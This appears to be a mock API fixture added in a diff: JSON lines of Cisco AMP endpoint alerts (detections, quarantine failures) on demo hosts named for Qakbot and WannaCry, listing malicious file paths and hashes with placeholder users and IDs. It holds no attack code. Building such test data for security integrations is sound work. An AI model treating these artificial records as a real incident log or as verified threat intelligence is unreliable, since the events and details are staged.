+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068994","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"6951045.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\6951045.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411538569722069000,"timestamp":1610646679,"timestamp_nanoseconds":495000000,"date":"2021-01-14T17:51:19+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"Auto.BAC7BC5281.in10.tht.Talos","detection_id":"6411538569722068993","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff","sha1":"99fffe78e0cbd7b508eed13a8633903dd89ed5f1","md5":"dc41e47ebba549ec5e616ed9e88a0376"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":297000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":812000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031906","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":3200,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":235000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":2708,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":172000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275399255031904","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275399255032000,"timestamp":1610645991,"timestamp_nanoseconds":281000000,"date":"2021-01-14T17:39:51+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419275394960064599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":423000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":377000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064596","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":33000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419275394960064594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419275394960065000,"timestamp":1610645990,"timestamp_nanoseconds":907000000,"date":"2021-01-14T17:39:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419275394960064607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}}
